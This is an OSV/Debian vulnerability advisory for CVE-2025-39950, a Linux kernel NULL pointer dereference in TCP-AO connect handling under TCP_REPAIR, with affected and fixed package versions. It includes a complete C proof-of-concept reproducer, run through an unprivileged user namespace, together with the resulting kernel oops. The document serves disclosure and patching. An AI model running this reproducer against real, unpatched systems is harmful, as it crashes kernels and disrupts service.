DEBIAN-CVE-2025-39950

Source
https://security-tracker.debian.org/tracker/CVE-2025-39950
Import Source
https://storage.googleapis.com/debian-osv/debian-cve-osv/DEBIAN-CVE-2025-39950.json
JSON Data
https://api.osv.dev/v1/vulns/DEBIAN-CVE-2025-39950
Upstream
Published
2025-10-04T08:15:48.253Z
Modified
2025-11-20T10:18:18.693123Z
Summary
[none]
Details

In the Linux kernel, the following vulnerability has been resolved:

net/tcp: Fix a NULL pointer dereference when using TCP-AO with TCP_REPAIR

A NULL pointer dereference can occur in tcp_ao_finish_connect() during a connect() system call on a socket with a TCP-AO key added and TCP_REPAIR enabled.

The function is called with skb being NULL and attempts to dereference it on tcp_hdr(skb)->seq without a prior skb validation.

Fix this by checking if skb is NULL before dereferencing it.

The commentary is taken from bpf_skops_established(), which is also called in the same flow. Unlike the function being patched, bpf_skops_established() validates the skb before dereferencing it.

Reproducer from the commit message (the underscores in identifiers and the line breaks were lost in extraction and are restored here; the header includes needed for a -Wall build are added):

    #include <string.h>
    #include <endian.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <netinet/tcp.h>
    #include <arpa/inet.h>

    int main(void){
        struct sockaddr_in sockaddr;
        struct tcp_ao_add tcp_ao;
        int sk;
        int one = 1;

        memset(&sockaddr,'\0',sizeof(sockaddr));
        memset(&tcp_ao,'\0',sizeof(tcp_ao));

        sk = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

        /* Add a TCP-AO key for the (still unspecified) peer address. */
        sockaddr.sin_family = AF_INET;
        memcpy(tcp_ao.alg_name,"cmac(aes128)",12);
        memcpy(tcp_ao.key,"ABCDEFGHABCDEFGH",16);
        tcp_ao.keylen = 16;

        memcpy(&tcp_ao.addr,&sockaddr,sizeof(sockaddr));

        setsockopt(sk, IPPROTO_TCP, TCP_AO_ADD_KEY, &tcp_ao, sizeof(tcp_ao));
        /* Enable repair mode, so connect() skips the handshake and skb is NULL. */
        setsockopt(sk, IPPROTO_TCP, TCP_REPAIR, &one, sizeof(one));

        sockaddr.sin_family = AF_INET;
        sockaddr.sin_port = htobe16(123);
        inet_aton("127.0.0.1", &sockaddr.sin_addr);

        connect(sk,(struct sockaddr *)&sockaddr,sizeof(sockaddr));

        return 0;
    }

    $ gcc tcp-ao-nullptr.c -o tcp-ao-nullptr -Wall
    $ unshare -Urn

    BUG: kernel NULL pointer dereference, address: 00000000000000b6
    PGD 1f648d067 P4D 1f648d067 PUD 1982e8067 PMD 0
    Oops: Oops: 0000 [#1] SMP NOPTI
    Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020
    RIP: 0010:tcp_ao_finish_connect (net/ipv4/tcp_ao.c:1182)

References

Affected packages

Debian:13 / linux

Package

Name
linux
Purl
pkg:deb/debian/linux?arch=source

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (unknown introduced version / all previous versions are affected)
Fixed
6.12.57-1

Affected versions

6.*

6.12.38-1
6.12.41-1
6.12.43-1~bpo12+1
6.12.43-1
6.12.48-1
6.12.57-1~bpo12+1

Ecosystem specific

{
    "urgency": "not yet assigned"
}

Database specific

source

"https://storage.googleapis.com/debian-osv/debian-cve-osv/DEBIAN-CVE-2025-39950.json"

Debian:14 / linux

Package

Name
linux
Purl
pkg:deb/debian/linux?arch=source

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (unknown introduced version / all previous versions are affected)
Fixed
6.16.9-1

Affected versions

6.*

6.12.38-1
6.12.41-1
6.12.43-1~bpo12+1
6.12.43-1
6.12.48-1
6.12.57-1~bpo12+1
6.12.57-1
6.13~rc6-1~exp1
6.13~rc7-1~exp1
6.13.2-1~exp1
6.13.3-1~exp1
6.13.4-1~exp1
6.13.5-1~exp1
6.13.6-1~exp1
6.13.7-1~exp1
6.13.8-1~exp1
6.13.9-1~exp1
6.13.10-1~exp1
6.13.11-1~exp1
6.14.3-1~exp1
6.14.5-1~exp1
6.14.6-1~exp1
6.15~rc7-1~exp1
6.15-1~exp1
6.15.1-1~exp1
6.15.2-1~exp1
6.15.3-1~exp1
6.15.4-1~exp1
6.15.5-1~exp1
6.15.6-1~exp1
6.16~rc7-1~exp1
6.16-1~exp1
6.16.1-1~exp1
6.16.3-1~bpo13+1
6.16.3-1
6.16.5-1
6.16.6-1
6.16.7-1
6.16.8-1

Ecosystem specific

{
    "urgency": "not yet assigned"
}

Database specific

source

"https://storage.googleapis.com/debian-osv/debian-cve-osv/DEBIAN-CVE-2025-39950.json"